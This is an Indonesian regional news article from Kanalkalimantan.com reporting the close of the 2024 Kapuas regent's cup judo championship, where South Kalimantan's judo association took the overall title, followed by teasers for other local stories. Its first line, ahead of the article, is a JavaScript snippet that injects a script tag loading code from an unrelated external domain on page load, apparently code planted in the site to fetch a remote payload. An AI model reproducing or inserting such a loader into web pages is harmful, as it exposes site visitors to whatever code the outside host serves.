(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,'script','https://frightysever.org/Bgkc244P');
KANALKALIMANTAN.COM, KUALA KAPUAS – Kejuaraan Judo Piala Pj Bupati Kapuas 2024 resmi berakhir, Minggu (3/3/2024) siang.
Kejuaraan judo Se Kalteng-Kalsel sebelumnya dibuka Penjabat Bupati Kapuas Erlin Hardi pada Sabtu (2/3/2024).
Penutupan kejuaraan judo dilakukan Ketua KONI Kabupaten Kapuas Septedy dihadiri Dandim 1011/Klk, Waka Polres Kapuas, Sekretaris PJSI Provinsi Kalteng, Sekretaris Umum KONI Kapuas, Ketua PJSI Kapuas dan undangan.
Baca juga: Kontes Kambing Se Kalimantan di Banjarbaru Berebut 5 Juara
Setelah para judoka mempertandingkan berbagai kelas sejak yang bergulir, PJSI (Persatuan Judo Seluruh Indonesia) Provinsi Kalimantan Selatan berhasil keluar sebagai juara umum.
Ketua Umum KONI Kapuas Septedy mengatakan, kejuaraan Judo ini dijadikan bahan evaluasi dan memperbaiki diri bibit-bibit atlet judo yang andal dan berprestasi.
Kejuaraan judo ini diikuti dari berbagai kabupaten, kota, dan provinsi tetangga yang telah melahirkan juara juara baru sebagai barometer perkembangan bela diri judo di Kalteng dan Kalsel.
Baca juga: Sasirangan Pewarna Alami Menarik Perhatian Pengunjung INACRAF 2024
Septedy juga mengucapkan selamat kepada para peraih medali. Ia berharap dengan prestasi tersebut para juara dapat mempertahankan dan lebih meningkatkan prestasi.
“Kepada yang belum berhasil, terus mengukir prestasi dan tidak patah semangat, dan menjadikan pengalaman ini sebagai cambuk untuk semangat berlatih secara rutin dan intensif guna meraih prestasi yang lebih baik,” pesan Septedy.
Sementara itu, Ketua PJSI Kapuas Moding mengatakan, Kejuaraan Judo Piala Pj Bupati Kapuas 2024 ini merupakan ajang pembinaan Judo yang berjenjang dan berkesinambungan. Selain itu, kejuaraan kali ini juga menjadi ajang mencari bibit atlet-atlet muda Judo.
Baca juga: HUT Ke-50 PPNI di Kabupaten Banjar Berlangsung Meriah
“Terima kasih kepada Pemkab Kapuas khususnya Pj Bupati Kapuas Bapak Erlin Hardi dan Sekda Kapuas Septedy yang menyupport penuh untuk kejuaran judo ini,” pungkasnya. (Kanalkalimantan.com/ags)
Reporter : ags
Editor : kk
KANALKALIMANTAN.COM, MARTAPURA – Banjir yang melanda Desa Gudang Hirang, Kecamatan Sungaitabuk, Kabupaten Banjar menggenangi sejumlah… Read More
KANALKALIMANTAN.COM, YOGYAKARTA - Ada tempat yang tidak perlu banyak kata untuk membuat orang betah. Begitu… Read More
KANALKALIMANTAN.COM, MARTAPURA – Banjir setinggi lutut orang dewasa menggenangi seluruh jalan di Komplek Antasari Perdana… Read More
KANALKALIMANTAN.COM, MARTAPURA - Banjir di Kabupaten Banjar masih belum menunjukkan penurunan ketinggian air secara signifikan,… Read More
Upah Minimum Provinsi (UMP) Kalimantan Timur 2026 telah ditetapkan dan ditandatangani oleh Gubernur Rudy Mas’ud… Read More
KANALKALIMANTAN.COM, BANJARMASIN – Mengawali pergantian tahun, Kota Banjarmasin diguyur hujan dari pagi hingga petang, Kamis… Read More
This website uses cookies.